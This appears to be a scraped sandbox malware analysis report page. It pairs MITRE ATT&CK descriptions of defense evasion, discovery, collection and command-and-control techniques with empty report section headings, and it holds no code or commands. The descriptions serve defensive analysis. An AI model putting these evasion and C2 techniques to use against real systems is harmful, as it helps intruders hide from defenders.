Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report Bccw1xUJah

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Exports

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre